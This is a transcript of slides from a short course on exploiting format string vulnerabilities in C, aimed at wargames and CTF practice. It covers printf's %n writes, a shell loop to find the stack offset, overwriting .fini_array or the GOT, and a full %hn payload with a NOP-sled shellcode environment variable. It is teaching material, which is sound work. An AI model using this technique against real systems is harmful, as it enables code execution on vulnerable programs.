Upgrade to Pro — share decks privately, control downloads, hide ads and more …

String format exploitation in 15"

String format exploitation in 15"

Short course I gave about format string vulnerabilities exploitation. Mostly for wargames/CTF.

Source code can be found at:
* https://github.com/milkmix-/training/tree/master/strfmt

Julien Bachmann

January 22, 2015
Tweet

More Decks by Julien Bachmann

Other Decks in Technology

Transcript

  1. intro | source? Coming from variadic functions va_arg printf Missing

    format string When user can specify is format string
  2. intro | man 3 printf printf(“hex value: %x”, 42); int

    i; printf(“number of bytes so far%n”, &i); printf(“%2$s %1$s\n”, “world”, “Hello”);
  3. read | find our buffer It is in the stack

    need to find the virtual argument to printf brute force it! possibly need to add [1-3] padding bytes to align on 4 bytes
  4. read | find our buffer for offset in `seq 0

    20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x"; echo; done | grep 4141 -B1
  5. write | specific address Put it in our buffer Use

    %n to write intead of %x to read Check the system endianness
  6. write | specific address What to overwrite? interesting variable GOT

    .dtor .fini_array checksec to validate writable zones
  7. write | specific address How to write Endianness again ;)

    Not possible to write 0xffffdee8 (shellcode address in environment) in one pass Split in two 0xdee8 0xffff - 0xdee8 Use %hn to write only a word and not rewrite first part
  8. write | specific address EGG=`python -c 'print "\x90"*100+"<shellcode>"'` ./strfmt `python

    -c 'print "B \x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'` @<.fini_array> @<.fini_array> + 2 0xdee8 - 9 0xffff - 0xdee8